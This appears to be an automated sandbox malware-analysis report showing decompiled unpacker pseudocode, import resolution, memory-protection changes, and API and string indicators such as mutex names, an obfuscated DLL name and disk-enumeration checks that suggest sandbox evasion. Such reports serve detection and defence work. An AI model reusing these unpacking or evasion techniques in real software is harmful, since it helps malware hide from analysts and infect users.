                                                                          									_t61 = _t61 - 1;
                                                                          								} while (_t61 != 0);
                                                                          								goto L4;
                                                                          							} else {
                                                                          								_t62 = _t61 + 1;
                                                                          								goto L22;
                                                                          								do {
                                                                          									do {
                                                                          										L22:
                                                                          										_t56 = _t53 + _t53;
                                                                          										if(_t56 == 0) {
                                                                          											_t56 =  *_t72;
                                                                          											_t72 = _t72 - 0xfffffffc;
                                                                          											asm("adc ebx, ebx");
                                                                          										}
                                                                          										asm("adc ecx, ecx");
                                                                          										_t53 = _t56 + _t56;
                                                                          										_t89 = _t53;
                                                                          									} while (_t89 >= 0);
                                                                          									if(_t89 != 0) {
                                                                          										break;
                                                                          									}
                                                                          									_t53 =  *_t72;
                                                                          									_t72 = _t72 - 0xfffffffc;
                                                                          									asm("adc ebx, ebx");
                                                                          								} while (_t72 >= 0);
                                                                          								_t61 = _t62 + 2;
                                                                          								goto L28;
                                                                          							}
                                                                          						}
                                                                          						_t26 =  *_t72;
                                                                          						_t72 =  &(_t72[0]);
                                                                          						_t27 = _t26 ^ 0xffffffff;
                                                                          						if(_t27 == 0) {
                                                                          							_pop(_t72);
                                                                          							_t3 =  &(_t72[0x8400]); // 0x422000
                                                                          							_t68 = _t3;
                                                                          							do {
                                                                          								_t28 =  *_t68;
                                                                          								_t68 =  &(_t68[0]);
                                                                          							} while (_t28 - 0xe8 > 1 ||  *_t68 != 2);
                                                                          							asm("rol eax, 0x10");
                                                                          							 *_t68 = ( *_t68 >> 8) - _t68 + _t72;
                                                                          							asm("loop 0xffffffdb");
                                                                          							_t6 =  &(_t72[0xd000]); // 0x435000
                                                                          							_t70 = _t6;
                                                                          							while(1) {
                                                                          								L37:
                                                                          								_t38 =  *_t70;
                                                                          								if(_t38 == 0) {
                                                                          									break;
                                                                          								}
                                                                          								_t7 =  &(_t70[4]); // 0x18368
                                                                          								_t60 = _t72 +  *_t7;
                                                                          								_t71 =  &(_t70[8]);
                                                                          								_t73 = LoadLibraryA( &(_t72[0xd944]) + _t38);
                                                                          								while(1) {
                                                                          									_t70 =  &(_t71[1]);
                                                                          									if( *_t71 == 0) {
                                                                          										goto L37;
                                                                          									}
                                                                          									asm("repne scasb");
                                                                          									_t38 = GetProcAddress(_t73, _t70);
                                                                          									if(_t38 == 0) {
                                                                          										ExitProcess();
                                                                          									}
                                                                          									 *_t60 = _t38;
                                                                          									_t60 =  &(_t60[4]);
                                                                          								}
                                                                          							}
                                                                          							_t74 = _t72[0xd96e];
                                                                          							_t15 = _t72 - 0x1000; // 0x400000
                                                                          							_t67 = _t15;
                                                                          							_t53 = 0x1000;
                                                                          							VirtualProtect(_t67, 0x1000, 4, _t77);
                                                                          							_t16 = _t67 + 0x19f; // 0x40019f
                                                                          							_t40 = _t16;
                                                                          							 *_t40 =  *_t40 & 0x0000007f;
                                                                          							_t40[0x28] = _t40[0x28] & 0x0000007f;
                                                                          							_t41 = _t38;
                                                                          							_push(_t41);
                                                                          							VirtualProtect(_t67, 0x1000, _t41, _t77); // executed
                                                                          							asm("popad");
                                                                          							_t44 =  &_v128;
                                                                          							do {
                                                                          								_push(0);
                                                                          							} while (_t77 != _t44);
                                                                          							_t78 = _t77 - 0xffffff80;
                                                                          							_t75 = _t78;
                                                                          							_t77 = _t78 - 8;
                                                                          							 *(_t78 - 8) = 2;
                                                                          							 *0x41949c(_t74); // executed
                                                                          							E00401150(); // executed
                                                                          							_t73 = _t75;
                                                                          							goto __ecx;
                                                                          						}
                                                                          						_t73 = _t27;
                                                                          						goto L16;
                                                                          						L4:
                                                                          						_t53 = _t53 + _t53;
                                                                          						_t79 = _t53;
                                                                          					} while (_t79 != 0);
                                                                          				}
                                                                          			}


































                                                                          0x00436cf0
                                                                          0x00436cf1
                                                                          0x00436cf6
                                                                          0x00436cf6
                                                                          0x00436cfc
                                                                          0x00436d0a
                                                                          0x00436d0a
                                                                          0x00436d0c
                                                                          0x00436d0f
                                                                          0x00436d11
                                                                          0x00436d11
                                                                          0x00436d00
                                                                          0x00436d02
                                                                          0x00436d03
                                                                          0x00436d05
                                                                          0x00000000
                                                                          0x00436d05
                                                                          0x00436d13
                                                                          0x00436d18
                                                                          0x00436d18
                                                                          0x00436d18
                                                                          0x00436d18
                                                                          0x00436d1a
                                                                          0x00436d1c
                                                                          0x00436d1e
                                                                          0x00436d21
                                                                          0x00436d21
                                                                          0x00436d23
                                                                          0x00436d25
                                                                          0x00436d25
                                                                          0x00436d25
                                                                          0x00436d29
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00436d2b
                                                                          0x00436d2d
                                                                          0x00436d30
                                                                          0x00436d30
                                                                          0x00436d34
                                                                          0x00436d39
                                                                          0x00436d48
                                                                          0x00436d48
                                                                          0x00436d4a
                                                                          0x00436d4c
                                                                          0x00436d4e
                                                                          0x00436d51
                                                                          0x00436d51
                                                                          0x00436d53
                                                                          0x00436d55
                                                                          0x00436d55
                                                                          0x00436d57
                                                                          0x00436d59
                                                                          0x00436d5b
                                                                          0x00436d5e
                                                                          0x00436d5e
                                                                          0x00436d60
                                                                          0x00436d62
                                                                          0x00436d84
                                                                          0x00436d8a
                                                                          0x00436d8d
                                                                          0x00436d93
                                                                          0x00436da4
                                                                          0x00436da4
                                                                          0x00436da6
                                                                          0x00436da9
                                                                          0x00436dab
                                                                          0x00436dae
                                                                          0x00436dae
                                                                          0x00436db3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00436d95
                                                                          0x00436d95
                                                                          0x00436d95
                                                                          0x00436d97
                                                                          0x00436d98
                                                                          0x00436d9a
                                                                          0x00436d9b
                                                                          0x00436d9b
                                                                          0x00000000
                                                                          0x00436d64
                                                                          0x00436d64
                                                                          0x00436d64
                                                                          0x00436d65
                                                                          0x00436d65
                                                                          0x00436d65
                                                                          0x00436d65
                                                                          0x00436d67
                                                                          0x00436d69
                                                                          0x00436d6b
                                                                          0x00436d6e
                                                                          0x00436d6e
                                                                          0x00436d70
                                                                          0x00436d72
                                                                          0x00436d72
                                                                          0x00436d72
                                                                          0x00436d76
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00436d78
                                                                          0x00436d7a
                                                                          0x00436d7d
                                                                          0x00436d7d
                                                                          0x00436d81
                                                                          0x00000000
                                                                          0x00436d81
                                                                          0x00436d62
                                                                          0x00436d3e
                                                                          0x00436d40
                                                                          0x00436d41
                                                                          0x00436d44
                                                                          0x00436dba
                                                                          0x00436dbb
                                                                          0x00436dbb
                                                                          0x00436dc6
                                                                          0x00436dc6
                                                                          0x00436dc8
                                                                          0x00436dcb
                                                                          0x00436ddd
                                                                          0x00436de9
                                                                          0x00436df0
                                                                          0x00436df2
                                                                          0x00436df2
                                                                          0x00436df8
                                                                          0x00436df8
                                                                          0x00436dfa
                                                                          0x00436dfc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00436dfe
                                                                          0x00436e08
                                                                          0x00436e0b
                                                                          0x00436e14
                                                                          0x00436e15
                                                                          0x00436e17
                                                                          0x00436e1a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00436e20
                                                                          0x00436e29
                                                                          0x00436e2b
                                                                          0x00436e34
                                                                          0x00436e34
                                                                          0x00436e2d
                                                                          0x00436e2f
                                                                          0x00436e2f
                                                                          0x00436e15
                                                                          0x00436e3a
                                                                          0x00436e40
                                                                          0x00436e40
                                                                          0x00436e46
                                                                          0x00436e51
                                                                          0x00436e53
                                                                          0x00436e53
                                                                          0x00436e59
                                                                          0x00436e5c
                                                                          0x00436e60
                                                                          0x00436e61
                                                                          0x00436e66
                                                                          0x00436e69
                                                                          0x00436e6a
                                                                          0x00436e6e
                                                                          0x00436e6e
                                                                          0x00436e70
                                                                          0x00436e74
                                                                          0x004012a1
                                                                          0x004012a3
                                                                          0x004012a6
                                                                          0x004012ad
                                                                          0x004012b3
                                                                          0x004012c9
                                                                          0x004012ca
                                                                          0x004012ca
                                                                          0x00436d46
                                                                          0x00000000
                                                                          0x00436d06
                                                                          0x00436d06
                                                                          0x00436d06
                                                                          0x00436d06
                                                                          0x00436d11

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cb57b2637f31c4b0bb4c4548e5751da683bed98e8b91aff3b22cba038993dc89
                                                                          • Instruction ID: faa7070d73a33d3e0609266b5279e24d70364a445711d7366cdba63fb82b5a64
                                                                          • Opcode Fuzzy Hash: cb57b2637f31c4b0bb4c4548e5751da683bed98e8b91aff3b22cba038993dc89
                                                                          • Instruction Fuzzy Hash: 43516A717443436BDB218E78DC806A57BA0EB1A330F2A573AC5E1CB3C5E79C580A8768
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                          • LoadLibraryA.KERNEL32 ref: 00404F41
                                                                          • InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: ConnectedHandleInternetLibraryLoadModuleState
                                                                          • String ID: jvavarg.qyy
                                                                          • API String ID: 2811557832-2169444084
                                                                          • Opcode ID: 953af9c795a126ac069cc6a1e7fdfe1744ad53d57e8d511445d16c2e39727e70
                                                                          • Instruction ID: fa78873cf606c18224dba544ef8f20ca223ab6e2b08164375e4fcb1cbc50bc80
                                                                          • Opcode Fuzzy Hash: 953af9c795a126ac069cc6a1e7fdfe1744ad53d57e8d511445d16c2e39727e70
                                                                          • Instruction Fuzzy Hash: 03F062B551530486DB10BF359AC629D7AE85F41368F058A3EF8A1A32D2E73CD64CC716
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • memset.MSVCRT ref: 00403A5C
                                                                          • GetDriveTypeA.KERNEL32 ref: 00403A9D
                                                                          • Sleep.KERNEL32 ref: 00403AB1
                                                                            • Part of subcall function 00403790: _mbscpy.MSVCRT ref: 004037D8
                                                                            • Part of subcall function 00403790: memset.MSVCRT ref: 0040383B
                                                                            • Part of subcall function 00403790: FindFirstFileA.KERNEL32 ref: 0040385C
                                                                            • Part of subcall function 00403790: lstrcpy.KERNEL32 ref: 004038CC
                                                                            • Part of subcall function 00403790: _mbscat.MSVCRT ref: 00403910
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: memset$DriveFileFindFirstSleepType_mbscat_mbscpylstrcpy
                                                                          • String ID: C:\
                                                                          • API String ID: 3442435128-3404278061
                                                                          • Opcode ID: d293f12a55a22e19086a37f23bce7869846b5feac95dcf43aac975cafdb9633c
                                                                          • Instruction ID: ed4c8215e4a3680eb399a4dacd5268703db01feabc7491714eb621602a4a9c6d
                                                                          • Opcode Fuzzy Hash: d293f12a55a22e19086a37f23bce7869846b5feac95dcf43aac975cafdb9633c
                                                                          • Instruction Fuzzy Hash: 1A015BB0C143AC89DB65AB6588563DEBFB49F01319F0484DED6C826282C7784BD8CFD6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403C15), ref: 0040484C
                                                                          • RegOpenKeyExA.ADVAPI32 ref: 0040487A
                                                                          • RegQueryValueExA.ADVAPI32 ref: 004048B5
                                                                          • RegCloseKey.ADVAPI32 ref: 004048C5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Open$CloseQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3546245721-0
                                                                          • Opcode ID: ad4d9fd33ac52e88bc97e916be29138adab017c360a3b7e03bc0d3226ec02f29
                                                                          • Instruction ID: 49bf87151660670d78cfdeefb83c057e4f3b6f757f6147e457b2a6993822bbc7
                                                                          • Opcode Fuzzy Hash: ad4d9fd33ac52e88bc97e916be29138adab017c360a3b7e03bc0d3226ec02f29
                                                                          • Instruction Fuzzy Hash: 0D21C8F49043099FDB00EF69C18575EBBF4BB48348F40892EE998A7341E378DA488B52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,00404A84), ref: 00404781
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047AF
                                                                          • RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047EA
                                                                          • RegCloseKey.ADVAPI32 ref: 004047FA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Open$CloseQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3546245721-0
                                                                          • Opcode ID: 958a2e4ef0ba8bedcf82df9d746db21d8d07d340abbef20f900d82c39de117dd
                                                                          • Instruction ID: 6ed68635854e72cbad61cdb7226dc2d583aa3803ebbc72776a4c5814d6946410
                                                                          • Opcode Fuzzy Hash: 958a2e4ef0ba8bedcf82df9d746db21d8d07d340abbef20f900d82c39de117dd
                                                                          • Instruction Fuzzy Hash: 962179B49043099FD700EF69D58579EBBF4BB48354F40896EE89897341E378D648CB52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00404748: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,00404A84), ref: 00404781
                                                                            • Part of subcall function 00404748: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047AF
                                                                            • Part of subcall function 00404748: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047EA
                                                                            • Part of subcall function 00404748: RegCloseKey.ADVAPI32 ref: 004047FA
                                                                          • CharLowerA.USER32 ref: 00404A8B
                                                                            • Part of subcall function 00404990: strstr.MSVCRT ref: 004049C7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Open$CharCloseLowerQueryValuestrstr
                                                                          • String ID: 012$SYSTEM\ControlSet001\Services\Disk\Enum
                                                                          • API String ID: 2399448135-1634863437
                                                                          • Opcode ID: 78eebafeba9169b15c599dbb74883321dd13a7f0e7c19f3bc8d5233c6d672bb7
                                                                          • Instruction ID: 870a1de997922802b68f1717d84fe3bed6c75bca7598e79a585ce558600d9c18
                                                                          • Opcode Fuzzy Hash: 78eebafeba9169b15c599dbb74883321dd13a7f0e7c19f3bc8d5233c6d672bb7
                                                                          • Instruction Fuzzy Hash: 7221A6B4904218DFCB60DF68EA8069DBBF4EB48314F50413AE958F7750D33499498F99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorLastMutex
                                                                          • String ID: k_fbpxf5nna
                                                                          • API String ID: 1925916568-3032876681
                                                                          • Opcode ID: 6f95fa231079c09e396f6b0f54b5f8dbb5f77dcec0ad5495da8417b03df94277
                                                                          • Instruction ID: b44495afc4b5e1c155c3d7f26a4bf6281c5b98a28f183e2cb1f81a9367dbc24a
                                                                          • Opcode Fuzzy Hash: 6f95fa231079c09e396f6b0f54b5f8dbb5f77dcec0ad5495da8417b03df94277
                                                                          • Instruction Fuzzy Hash: 17E04FB0418308DAC700BF71C1C664DBEE4AB80348F40893EE888622C2C778958C8727
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorLastMutex
                                                                          • String ID: IHYanFuibyan
                                                                          • API String ID: 1925916568-2233043627
                                                                          • Opcode ID: 90a2e3c8c183a3a040ff48c78d001bcb7690f83f18904d60cf146c94564bbd81
                                                                          • Instruction ID: b226eb3715ba9fc3d7238d88576273fb4163caaa6f42e8cd02b01324a8811274
                                                                          • Opcode Fuzzy Hash: 90a2e3c8c183a3a040ff48c78d001bcb7690f83f18904d60cf146c94564bbd81
                                                                          • Instruction Fuzzy Hash: 30E04FB0408308DACB00BF71C1C564DBEE4AB40388F40853EE888622C2C778954C8727
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
